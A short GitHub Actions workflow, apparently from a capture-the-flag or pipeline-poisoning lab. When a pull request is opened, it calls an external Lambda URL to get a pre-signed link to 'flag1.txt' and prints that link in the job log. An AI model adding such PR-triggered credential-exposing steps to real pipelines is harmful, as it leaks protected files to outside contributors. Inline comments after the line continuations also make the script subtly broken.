name: Expose Credentials

on:
  pull_request:
    types: [opened]

jobs:

  expose-creds:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Generate Pre-signed URL
        id: presigned-url
        run: |
          presigned_url=$(curl -X POST \
          -G \  # Use -G to send data as query string parameters
          -d "file_name=flag1.txt" \  # Send file_name as query param
          -d "storage=poisonous-flag" \  # Send storage as query param
          https://bpi345cblz2xputo5mhbwi3ycu0asyav.lambda-url.us-east-2.on.aws/)
          echo "::set-output name=url::$presigned_url"

  

      - name: Expose Credentials
        run: |
          echo "You can access the file at ${{ steps.presigned-url.outputs.url }}"
